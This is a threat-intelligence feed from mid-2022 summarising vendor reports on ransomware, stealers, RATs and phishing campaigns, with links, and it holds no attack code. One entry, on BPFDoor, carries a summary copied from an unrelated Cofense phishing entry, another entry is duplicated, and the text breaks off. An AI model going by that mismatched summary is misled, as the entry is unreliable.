https://www.crowdstrike.com/blog/catapult-spider-adversary-quest-walkthrough-2022/
—
- Intel Source:
- ReversingLabs
- Intel Name:
- GwisinLocker_Ransomware_Targets_Linux_Based_Systems
- Date of Scan:
- 2022-08-08
- Impact:
- LOW
- Summary:
- A new ransomware family called ‘GwisinLocker’ has emerged targeting South Korean healthcare, industrial, and pharmaceutical companies with Windows and Linux encryptors.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Bumblebee_malware_activity_distributed_through_Projector_Libra
- Date of Scan:
- 2022-08-05
- Impact:
- MEDIUM
- Summary:
- Researchers from PaloAlto have identified Bumblebee malware distributing through Projector Libra. It is a criminal group that uses file sharing services to distribute malware after direct email correspondence with a potential victim.
Source:
https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/
—
- Intel Source:
- Fortinet
- Intel Name:
- A_new_IoT_malware_family_called_RapperBot
- Date of Scan:
- 2022-08-05
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs has identified a new family of IoT malware that uses code derived from the Mirai network to gain access to SSH servers and maintain persistence on a victim device after it is removed.
Source:
https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery
—
- Intel Source:
- Deepwatch
- Intel Name:
- Threat_Actor_leverages_Confluence_Bug_to_Deploy_Ljl_Backdoor
- Date of Scan:
- 2022-08-05
- Impact:
- MEDIUM
- Summary:
- A novel backdoor called Ljl discovered by Deepwatch Adversary Tactics and Intelligence Team. The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian’s Confluence directory,” the company said. “After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment.”
Source:
https://cdn1.hubspot.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/eBooks/Deepwatch%20Incident%20Intel%20Report%20-%20Novel%20Backdoor%20Discovered%20-%20Aug%202022.pdf
https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/ljlBackdoor%20Analysis.pdf
—
- Intel Source:
- Cyble
- Intel Name:
- LOLI_Stealer_A_new_Golang_Based_InfoStealer
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Cyble researchers came across a new golang based infostealer dubbed LOLI stealer. This stealer was being sold via Maas Model.
Source:
https://blog.cyble.com/2022/08/03/loli-stealer-golang-based-infostealer-spotted-in-the-wild/
—
- Intel Source:
- VirusTotal
- Intel Name:
- Malware_disguised_as_Legitimate_Software
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Researchers from VirusTotal have analyzed malware samples and found 1,816 samples since January 2020 that masqueraded as legitimate software by packaging the malware in installers for other popular software such as Google Chrome, Malwarebytes, Zoom, Brave, Mozilla Firefox, and Proton VPN.
Source:
https://blog.virustotal.com/2022/08/deception-at-scale.html
—
- Intel Source:
- ASEC
- Intel Name:
- A_distribution_of_malicious_Word_files_with_North_Korea_related_materials
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- The ASEC analysis team has discovered another distribution of malicious Word files with North Korea-related materials. The malicious Word files are distributed in various names most likely through the email and with a file related to a specific webinar and accesses C2 through mshta.
—
- Intel Source:
- Mandiant
- Intel Name:
- New_campaign_by_Iranian_Threat_Actor
- Date of Scan:
- 2022-08-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Mandiant identified politically motivated disruptive attack against Albanian government organizations. Usage of ROADSWEEP ransomware and CHIMNEYSWEEP backdoor was also noted by the researchers.
—
- Intel Source:
- Cloudsek
- Intel Name:
- Deep_Analysis_of_Bumblebee_Malware
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Researchers from CloadSEK did a deep analysis of the Bumblebee malware loader where the adversaries push ISO files through compromised email chains, known as thread hijacked emails, to deploy the Bumblebee loader.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Malware_campaigns_leveraging_”Dark Utilities”_platform
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Researchers at Cisco Talos has identified a C2-as-a-service (C2aaS) platform known as “Dark Utilities” offering a variety of services such as remote system access, DDoS capabilities and cryptocurrency mining. The payloads provided by the platform support Windows, Linux and Python-based implementations.
Source:
https://blog.talosintelligence.com/2022/08/dark-utilities.html
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Russian_organizations_attacked_with_new_Woody_RAT_malware
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes Threat Intelligence team have identified a new Remote Access Trojan called Woody Rat that allows them to control and steal information from compromised devices remotely.
—
- Intel Source:
- Walmart
- Intel Name:
- IcedID_leveraging_PrivateLoader
- Date of Scan:
- 2022-08-04
- Impact:
- LOW
- Summary:
- Researcchers from Walmart have analysed PrivateLoader is continue to function as an effective loading service and recently leveraging the use of SmokeLoader for their loads.
Source:
https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f
—
- Intel Source:
- Iornnet
- Intel Name:
- Robin_Banks_PhaaS_Targeting_Citibank_Customers
- Date of Scan:
- 2022-08-03
- Impact:
- LOW
- Summary:
- Researchers from IronNet have identified Phishing-as-a-Service platform Robin Banks selling ready to use phishing kits to cybercriminals. The kits are used to obtain financial details of victims living in the U.S, the U.K, Canada, and Australia.
Source:
https://www.ironnet.com/blog/robin-banks-a-new-phishing-as-a-service-platform
—
- Intel Source:
- Cyble
- Intel Name:
- Mars_Stealer_distributing_via_fake_wallet_site
- Date of Scan:
- 2022-08-02
- Impact:
- LOW
- Summary:
- Cyble Research Labs due to their research, discovered Mars stealer and the threat actors behind Mars stealer are adopting sophisticated phishing attacks to distribute Mars Stealer and gather user credentials, system information, and other sensitive data.
Source:
https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Manjusaka_Offensive_Framework
- Date of Scan:
- 2022-08-02
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco Talos has discovered a new attack framework called Manjusaka. This framework is advertised as reproduction of Cobalt Strike framework. Moreover, implants for the malware are written in Rust language for Windows and Linux.
Source:
https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html
—
- Intel Source:
- Trendmicro
- Intel Name:
- An_updated_variant_of_SolidBit_ransomware_new_targets
- Date of Scan:
- 2022-08-02
- Impact:
- LOW
- Summary:
- Threndmicro published the technical analysis of a new SolidBit variant that is a threat to different applications to lure gamers and social media users. SolidBit has been suspected of being a LockBit ransomware copycat. Also, this ransomware group appears to be planning to expand its operations through these fraudulent apps and its recruitment of ransomware-as-a-service affiliates.
Source:
https://www.trendmicro.com/en_us/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamer.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamers-and-social-media-users-with-new-variant-/IOCs-SolidBit-Ransomware-Enters-the-RaaS-Scene-and-Takes-Aim-at-Gamers-and-Social-Media-Users-With-New-Variant%20.txt
—
- Intel Source:
- EclecticIQ
- Intel Name:
- Emotet_Downloader_Leveraging_Regsvr32_tool
- Date of Scan:
- 2022-08-02
- Impact:
- LOW
- Summary:
- Researchers from EclecticIQ have observed Emotet downloader distributing via the Regsvr32 tool for execution.
Source:
https://blog.eclecticiq.com/emotet-downloader-document-uses-regsvr32-for-execution
—
- Intel Source:
- SentinelOne
- Intel Name:
- LockBit_Ransomware_Leveraging_Windows Defender_to_load_Cobalt_Strike_Payload
- Date of Scan:
- 2022-08-02
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have recently investigated the LockBit Ransomware and found that threat actor is abusing the Windows Defender command line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads.
—
- Intel Source:
- Zscaler
- Intel Name:
- Analysis_on_Industrial_Spy_Ransomware
- Date of Scan:
- 2022-08-02
- Impact:
- MEDIUM
- Summary:
- Zscaler published their technical analyses on the Industrial Spy ransomware group that emerged in April 2022 that started by ransoming stolen data and more recently has combined these attacks with ransomware.The threat group exfiltrates and sells data on their dark web marketplace, but does not always encrypt a victim’s files. Also they utilizes a combination of RSA and 3DES to encrypt files.
—
- Intel Source:
- Security Scorecard
- Intel Name:
- A_Deep_Dive_Analysis_of_RedLine_Stealer_Malware
- Date of Scan:
- 2022-08-02
- Impact:
- LOW
- Summary:
- Researchers have recently done an in-depth investigation on RedLine Stealer which is distributing cracked games, applications, and services.
Source:
https://securityscorecard.com/research/detailed-analysis-redline-stealer
—
- Intel Source:
- Cofense
- Intel Name:
- Attackers_Leveraging_New_Phishing_Techniques
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- Researchers from the Phishing Defense Center of Cofense have observed a huge variety of phishing techniques. In this, some of the techniques are quite unique in methods of getting the end user to interact with the message.
Source:
https://cofense.com/blog/countdown-timer-ransomware-themed-phishing-attack
—
- Intel Source:
- SpiderLabs
- Intel Name:
- Phishing_Attacks_Increase_Using_Decentralized_IPFS_Network
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- Researchers from SpiderLab have identified that the decentralized file system solution ‘IPFS’ is becoming the new place for hosting phishing sites. Also, they identified no less than 3,000 emails containing IPFS phishing URLs as an attack vector in the last three months.
Source:
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/
—
- Intel Source:
- Securelist
- Intel Name:
- A new_malicious_campaign_LofyLife
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- The Kaspersky has discovered a new threat in the open-source software repository “LofyLife” – a malicious campaign to steal tokens and bank card data.
Source:
https://securelist.com/lofylife-malicious-npm-packages/107014/
—
- Intel Source:
- Qualys
- Intel Name:
- Multiple_APT_Groups_Leveraging_Quasar_RAT
- Date of Scan:
- 2022-08-01
- Impact:
- MEDIUM
- Summary:
- Researchers from Qualys have analyzed the Quasar RAT which is widely leveraged by multiple threat actor groups targeting government and private organizations in Southeast Asia and other geographies.
—
- Intel Source:
- Inquest
- Intel Name:
- Green_Stone_sample_attributed_to_Iran
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- Inquest discovered a maliciuos sample that was uploaded from Iran. The document is a contract for the supply of services to an energy company from southern Iran «Tavangoostar Niro va Gashtavar Jonob». The document also contains a link to this energy company. www.tavangyl.com. Analysts named it Green Stone since this family of malicious documents containing executable files was not previously known.
—
- Intel Source:
- Trustwave
- Intel Name:
- An_increasing_number_of_phishing_emails_containing_IPFS_URLs
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- Trustwave noticed an increasing number of phishing emails containing IPFS URLs as their payload. Also they have observed more than 3,000 emails containing phishing URLs that have utilized IPFS for the past 90 days and it is evident that IPFS is increasingly becoming a popular platform for phishing websites.
Source:
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/
—
- Intel Source:
- Qualys
- Intel Name:
- Diving_Deep_into_BPFDoor_Malware
- Date of Scan:
- 2022-08-01
- Impact:
- LOW
- Summary:
- Researchers from the Phishing Defense Center of Cofense have observed a huge variety of phishing techniques. In this, some of the techniques are quite unique in methods of getting the end user to interact with the message.
—
- Intel Source:
- Sucuri
- Intel Name:
- WebAssembly_frequently_used_for_cryptomining
- Date of Scan:
- 2022-07-29
- Impact:
- LOW
- Summary:
- Sucuri recently contacted by a their client who noticed that their computer slowed down to a crawl every time they navigated to their own WordPress website. A cursory review of their site files revealed the following snippet of code injected into one of their theme files.
Source:
https://blog.sucuri.net/2022/07/cryptominers-webassembly-in-website-malware.html
—
- Intel Source:
- Cybergeeks
- Intel Name:
- Analysis_on_Symbiote_Malware
- Date of Scan:
- 2022-07-29
- Impact:
- LOW
- Summary:
- The malware’s purpose is to steal credentials from the SSH and SCP processes by hooking the libc read function.
Source:
https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/
—
- Intel Source:
- ReversingLabs
- Intel Name:
- The_new_discovered_Follina_exploit_used by_attackers_again
- Date of Scan:
- 2022-07-29
- Impact:
- MEDIUM
- Summary:
- ReversingLabs analyzed three malicious payloads circulating online that have been linked to use of the newly discovered Follina exploit in Microsoft’s Support Diagnostic Tool (MSDT).
Source:
https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks
—
- Intel Source:
- Inquest
- Intel Name:
- An_Excel_Infection_Chain
- Date of Scan:
- 2022-07-29
- Impact:
- LOW
- Summary:
- Inquest researcher discovered that th threat actor make user tempt trying to enable content in Excel in order to run whatever surprise they have hidden inside.
Source:
https://inquest.net/blog/2022/07/25/convoluted-infection-chain-using-excel
—
- Intel Source:
- Volexity
- Intel Name:
- North_Korean_threat_actor_SharpTongue
- Date of Scan:
- 2022-07-29
- Impact:
- LOW
- Summary:
- Volexity discovered a new MAIL-THEFT malware “SHARPEXT” that believed has been used by a thret actor SharpTongue. This actor is believed to be North Korean in origin and is often publicly referred to under the name Kimsuky.
—
- Intel Source:
- Cyble, SocInvestigations
- Intel Name:
- Threat_Actors_leveraging_Microsoft_Applications_via_DLL_SideLoading
- Date of Scan:
- 2022-07-28
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyble and SOCInvestigation have identified the DLL (Dynamic-Link Library) sideloading technique leveraged by Threat Actors to spread payloads to users using legitimate applications which load malicious DLL files that spoof legitimate ones.
Source:
https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/
https://www.socinvestigation.com/threat-actors-leveraging-microsoft-applications-via-dll-sideloading-detection-response/
—
- Intel Source:
- ASEC
- Intel Name:
- A_Korean_Web_Portal_Page_Daum_using_for_Spreading_Phishing_Emails
- Date of Scan:
- 2022-07-28
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the distribution of phishing emails impersonating a Korean Web Portal Page (Daum) and attackers using attachments to redirect the user to a phishing webpage.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Gootkit_Loaders_Updated_TTPs_of_Cobalt Strike
- Date of Scan:
- 2022-07-28
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro have identified the new tactics of Gootkit Loader. It is used for fileless techniques to drop Cobalt Strike and other malicious payloads.
—
- Intel Source:
- Microsoft
- Intel Name:
- KnotWeed_targets_UK_Austria_with_SubZero_malware
- Date of Scan:
- 2022-07-28
- Impact:
- MEDIUM
- Summary:
- MSTIC identified a private threat actor who is Austria based and dubbed KnotWeed have been targeting law firms, banks, and strategic consultancies in Austria, the United Kingdom, and Panama with SubZero malware.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Analysis_of_SSH_Honeypot_Data_with_PowerBI
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- The reseracher from ISC Sans providing some analysis of SSH Honeypot Data experimenting for a while with Microsoft PowerBI (1) using honeypot data, parsing it into comma delimited (CSV).
—
- Intel Source:
- Esentire
- Intel Name:
- Gootloader_expands_its_payload_to_deliver_IcedID_malware
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable Gootloader incident delivered an IcedID loader. The malware targets domain joined machines. The infection starts with the user visiting the infected website with a lure to download a ZIP file.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-gootloader-and-icedid
—
- Intel Source:
- Microsoft
- Intel Name:
- IIS_extensions_persistently_used_as_Exchange_backdoors
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- Microsoft says attackers increasingly use malicious Internet Information Services (IIS) web server extensions to backdoor unpatched Exchange servers as they have lower detection rates compared to web shells.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0010_Group_leveraging_GammaLoad_PS1_v2_malware_to_target_Ukraine
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- CERT-UA has analysed a phishing email which contains an attachment of malicious document related to National Academy of Security of Ukraine. The document contains an HTM dropper, the activation of which will lead to the creation of RAR archive file and further LNK file, running of LNK file lead to the download and execution of the HTA file.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- IcedID_malware_leveraging_Cobalt_Strike_and_Dark_VNC
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- The researcher from ISC SANS provides an analysis of IcedID malware which is using Dark VNC activity and Cobalt Strike.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0100_Group_leveraging_phishing_sites to_target_Ukrainian_Banks
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- CERT-UA has discovered an online fraud using phishing sites with the subject line of “aid from the Red Cross” which is targeting popular Ukrainian banks.
—
- Intel Source:
- Yoroi ZLab
- Intel Name:
- Diving_Deep_into_Hive_Ransomware
- Date of Scan:
- 2022-07-27
- Impact:
- MEDIUM
- Summary:
- Researchers from Yoroi ZLab deep dives into Hive Ransomware and identified it as a most sophisticated active threat. Also, they are tracking this infamous threat actor and observing any modification in its technique to provide a guideline.
Source:
https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/?&web_view=true
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0041_Group_distributing_Formbook_and_Snake_Keylogger
- Date of Scan:
- 2022-07-27
- Impact:
- LOW
- Summary:
- CERT-UA has analysed a phishing email which contains an attachment of malicious document related to Final payment. The document contains an EXE file classified as the RelicRace .NET downloader, the activation of which running of payload.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Similarities_between_LockBit_3_0_and_BlackMatter_ransomware
- Date of Scan:
- 2022-07-27
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro found similarities between New version of LockBit and Blackmatter ransomware. LockBit’s extensive similarities to BlackMatter come from overlaps in the privilege escalation and harvesting routines used to identify APIs.
—
- Intel Source:
- Sophos
- Intel Name:
- Attacks_against_a_pair_of_vulnerabilities_in_Microsoft_SQL
- Date of Scan:
- 2022-07-26
- Impact:
- LOW
- Summary:
- Sophos Managed Threat Response (MTR) and Sophos Rapid Response had been investigating the attacks against Microsoft SQL Server installations. Sophos observed that threat group targeting externally exposed and unpatched SQL servers and during their initial investigations into this threat group, they saw them leveraging malware infrastructure impersonating a download site for KMSAuto, a non-malicious software utility used for evading Windows license key activations.
Source:
https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/
—
- Intel Source:
- Securelist
- Intel Name:
- A_New_CosmicStrand_UEFI_Firmware_Rootkit
- Date of Scan:
- 2022-07-26
- Impact:
- LOW
- Summary:
- A sophisticated UEFI firmware rootkit has been developed by an unknown Chinese-speaking threat actor, according to security firm Kaspersky. The rootkit is located in the firmware images of Gigabyte or ASUS motherboards, and Kaspersky noticed that all these images are related to designs using the H81 chipset.
Source:
https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/
—
- Intel Source:
- Cyble
- Intel Name:
- The_Source_Code_of_Luca_Stealer_Malware_Leaked
- Date of Scan:
- 2022-07-26
- Impact:
- LOW
- Summary:
- The Cyble Threat Hunting team recently discovered an unknown Rust-based stealer, which is known as Luca Stealer, and the source code of this stealer was leaked on a popular cybercrime forum for free on July 3, 2022.
Source:
https://blog.cyble.com/2022/07/25/luca-stealer-source-code-leaked-on-a-cybercrime-forum/
—
- Intel Source:
- PWC
- Intel Name:
- New_tool_by_Charming_Kitten_and_its_OPSEC_errors
- Date of Scan:
- 2022-07-26
- Impact:
- MEDIUM
- Summary:
- PWC researchers analyzed activity of Yellow Garuda threat actor aka Charming Kitten and found that they have come up with new tools and also their operational security errors.
Source:
https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/old-cat-new-tricks.html
—
- Intel Source:
- Cyble
- Intel Name:
- The_Source_Code_of_Luca_Stealer_Malware_Leaked
- Date of Scan:
- 2022-07-26
- Impact:
- LOW
- Summary:
- The Cyble Threat Hunting team recently discovered an unknown Rust-based stealer, which is known as Luca Stealer, and the source code of this stealer was leaked on a popular cybercrime forum for free on July 3, 2022.
Source:
https://blog.cyble.com/2022/07/25/luca-stealer-source-code-leaked-on-a-cybercrime-forum/
—
- Intel Source:
- Avast
- Intel Name:
- Candiru_Spyware_exploiting_Chrome_Zero_days_in_Middle_East
- Date of Scan:
- 2022-07-25
- Impact:
- LOW
- Summary:
- Avast researchers discovered a zero-day vulnerability in Google Chrome but now its fixed. The vulnerability was weaponized by an Israeli spyware company and used in attacks targeting journalists in the Middle East.
Source:
https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/
—
- Intel Source:
- NoLogs NoBreach
- Intel Name:
- Dot_PLAY_Ransomware
- Date of Scan:
- 2022-07-25
- Impact:
- MEDIUM
- Summary:
- A Threat Researcher has identified new ransomware variant during an IR engagement, which is called as .PLAY ransomware. Researcher confirms the initial access was exploitation of Fortigate Firewall vulnerabilities over Fortigate SSL-VPN, after initial access threat actors achieved privilege escalation and ransomware deployment in less than 24 hours. Moreover, No C2 traffic or tooling was detected. All actions were carried out over the VPN and through RDP.
Source:
https://nologs-nobreach.com/2022/07/24/play-ransomware/
—
- Intel Source:
- Cyble
- Intel Name:
- Qakbot_continue_with_New_Techniques
- Date of Scan:
- 2022-07-25
- Impact:
- LOW
- Summary:
- Researchers from Cyble Lab came across Twitter post in which a user shared new IOCs related to the well known Qakbot malware.
Source:
https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_started_using_Windows_installer_package_file
- Date of Scan:
- 2022-07-25
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified Magniber Ransomware that started using a Windows installer package file (.msi) instead of IE browser vulnerability for its distribution.
—
- Intel Source:
- Securonix
- Intel Name:
- North_Korean_linked_APT37_group_attack_with_Konni_RAT_malware
- Date of Scan:
- 2022-07-25
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs is investigating a new attack campaign exploiting high-value targets, including North Korea, which could be linked to a North Korean cyber-espionage group (APT37).
Source:
https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/
—
- Intel Source:
- ASEC
- Intel Name:
- Attackers_targeting_unpatched_Atlassian_Confluence_Servers
- Date of Scan:
- 2022-07-25
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC have analyzed that attackers are targeting vulnerable servers which are not patched. They are using RCE vulnerabilities and if successful, an attacker can install WebShell or malware to gain control of the infected system.
—
- Intel Source:
- ASEC
- Intel Name:
- IcedID_malware_sperading_through_ISO_files
- Date of Scan:
- 2022-07-25
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that IcedID banking malware distributing with the help of ISO Files. They discovered two methods, the First is by the help of Bubblebee malware and the second is with script files and cmd command.
—
- Intel Source:
- AdvIntel
- Intel Name:
- Costa_Rican_Government_hacked_by_Conti_Ransomware
- Date of Scan:
- 2022-07-25
- Impact:
- LOW
- Summary:
- ADVIntel researchers uncovered how Conti ransomware hacked and encrypted the Costa Rican government. The Russian hacker steps from an initial foothold to exfiltrating 672GB of data on April 15.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- GoMet_2_0_backdoor_attacks_Ukraine
- Date of Scan:
- 2022-07-24
- Impact:
- MEDIUM
- Summary:
- Cisco Talos has discovered a modified piece of malware targeting Ukraine and confirmed that the malware is a slightly modified version of the open-source backdoor named “GoMet2″.
Source:
https://blog.talosintelligence.com/2022/07/attackers-target-ukraine-using-gomet.html
—
- Intel Source:
- MalwareBytes
- Intel Name:
- A_malvertising_chain_abusing_Google_s_ad_network
- Date of Scan:
- 2022-07-24
- Impact:
- LOW
- Summary:
- Malwarebytes researchers uncovered a malvertising chain abusing Google’s ad network to redirect visitors to an infrastructure of tech support scams. Unsuspecting users searching for popular keywords will click an advert and their browser will get hijacked with fake warnings urging them to call rogue Microsoft agents for support.
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_changing_its_Injection_Method
- Date of Scan:
- 2022-07-22
- Impact:
- LOW
- Summary:
- ASEC researchers constantly monitoring Magniber ransomware and found recently it is changing injection methods and started distributing as a Windows installer package file (.msi) on Edge and Chrome browsers.
—
- Intel Source:
- ProofPoint
- Intel Name:
- TA4563_leverages_EvilNum_malware_to_target_European_financial_entities
- Date of Scan:
- 2022-07-22
- Impact:
- MEDIUM
- Summary:
- ProofPoint researchers tracked threat actor which they named TA4563 have been leveraging EvilNum malware to target European financial and investment entities.
—
- Intel Source:
- Sentinelone
- Intel Name:
- LockBit_3_0_updated_with_new_techniques
- Date of Scan:
- 2022-07-22
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelLab have detected the new techniques and features of LockBit 3.0. They are updating their encryption routines and adding several new features.
—
- Intel Source:
- Mandiant
- Intel Name:
- CNMF_Discloses_Malware_in_Ukraine
- Date of Scan:
- 2022-07-22
- Impact:
- MEDIUM
- Summary:
- Mandiant shared in their blog a new malicious activity targeting Ukrainian entities during the ongoing conflict.They higlighted the operations of suspected UNC1151 and suspected UNC2589 by sending phishing with malicious documents leading to malware infection chains.
Source:
https://www.mandiant.com/resources/spear-phish-ukrainian-entities
—
- Intel Source:
- Intezer
- Intel Name:
- Lighting_Framework_A_new_Linux_centric_malware
- Date of Scan:
- 2022-07-22
- Impact:
- MEDIUM
- Summary:
- Researchers at Intezers have detected a new undetected Swiss Army Knife-like Linux malware called Lightning Framework.
Source:
https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/
—
- Intel Source:
- ASEC
- Intel Name:
- SmokeLoader_malware_leveraging_Amadey_Bot
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- ASEC researchers discovered that Amadey Bot is being installed by SmokeLoader. Amadey Bot is capable of stealing information and installing additional malware by receiving commands from the attacker. Where SmokeLoader is used to install additional malware strains as a downloader.
—
- Intel Source:
- Cert-UA
- Intel Name:
- Threat_actors_leveraging_AgentTesla_to_target_Ukraine_state_bodies
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- CERT-UA discovered the file “Report_050722_4.ppt”, which contains a thumbnail image that mentions the operational command “South”. In the case of opening the document and activating the macro, the latter will ensure the creation of the files “gksg023ig.lnk” and “sgegkseg23mjl.exe”, as well as the execution of the LNK file using rundll32.exe, which in turn will lead to the launch of the mentioned EXE file.
—
- Intel Source:
- Google blog
- Intel Name:
- Continued_cyber_activity_in_Eastern_Europe
- Date of Scan:
- 2022-07-21
- Impact:
- MEDIUM
- Summary:
- Google’s Threat Analysis Group (TAG) continues to closely monitor Russian APT activity outside of Ukraine. TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm, Turla, COLDRIVER, Ghostwriter/UNC1151 groups and The Follina vulnerability.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Analysis_of_NukeSped_Malware
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- Researchers at Cyfirma analyzed NukeSped Malware. The malware is associated with North Korean #APT Group Lazarus which is known to target US, South Korea, Japan and Asia Pacific countries.
Source:
https://www.cyfirma.com/outofband/nukesped-rat-report/
—
- Intel Source:
- WeLivesecurity
- Intel Name:
- CloudMensis_spyware_targets_MacOS_systems
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- Researchers from ESET discovered a previously undetected macOS backdoor, tracked as CloudMensis, that targets macOS systems and exclusively uses public cloud storage services as C2.
Source:
https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/
https://www.jamf.com/blog/cloudmensis-malware/
—
- Intel Source:
- Cyble
- Intel Name:
- Redeemer_Ransomware_released_new_version_Redeemer_2_0
- Date of Scan:
- 2022-07-21
- Impact:
- MEDIUM
- Summary:
- Researchers at Cyble has identified the latest version of Redeemer ransomware on darkweb cybercrime forums. The author of Redeemer ransomware released new version with updated features.
—
- Intel Source:
- Fortinet
- Intel Name:
- A_new_variant_of_QakBot
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- Fortinet’s researchers observered a phishing email as part of a phishing campaign spreading a new variant of QakBot.
—
- Intel Source:
- ISC SANS
- Intel Name:
- PyAutoGUI_lets_your_Python_scripts_control_the_mouse_and_keyboard
- Date of Scan:
- 2022-07-21
- Impact:
- LOW
- Summary:
- PyAutoGUI lets malicious Python scripts control the mouse and keyboard to automate interactions with other applications
Source:
https://isc.sans.edu/diary/Malicious+Python+Script+Behaving+Like+a+Rubber+Ducky/28860
—
- Intel Source:
- BitDefender
- Intel Name:
- Industrial_Espionage_Operation_explained
- Date of Scan:
- 2022-07-20
- Impact:
- MEDIUM
- Summary:
- Researchers from BitDefender analyzed an incident which was an industrial Espionage operation. In this attack the attacker managed to compromise a Patient Zero computer and used it to establish a secondary access avenue through a web shell planted on the company’s Exchange Server.
—
- Intel Source:
- Lacework
- Intel Name:
- WatchDog_Adds_Steganography_in_Cryptojacking_Operations
- Date of Scan:
- 2022-07-20
- Impact:
- LOW
- Summary:
- Reserachers from Lacework reported about WatchDog’s cryptojacking campaign has adopted the unique steganography technique for malware propagation and other objectives. The XMRig miner was disguised as an image and hosted on compromised cloud storage (Alibaba Object Storage Service).
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- Open_Document_malware_targets_Latin_American_Hotels
- Date of Scan:
- 2022-07-20
- Impact:
- LOW
- Summary:
- Researchers from HP Wolf Security analyzed a stealthy malware campaign which uses OpenDocument text (.odt) files to distribute malware. The campaign targets the hotel industry in Latin America.
—
- Intel Source:
- Sentinelone
- Intel Name:
- 8220_Gang_Massively_Expands_Cloud_Botnet
- Date of Scan:
- 2022-07-20
- Impact:
- MEDIUM
- Summary:
- Over the last month a crimeware group best known as 8220 Gang has expanded their botnet to roughly 30,000 hosts globally through the use of Linux and common cloud application vulnerabilities and poorly secured configurations.
—
- Intel Source:
- Palo Alto
- Intel Name:
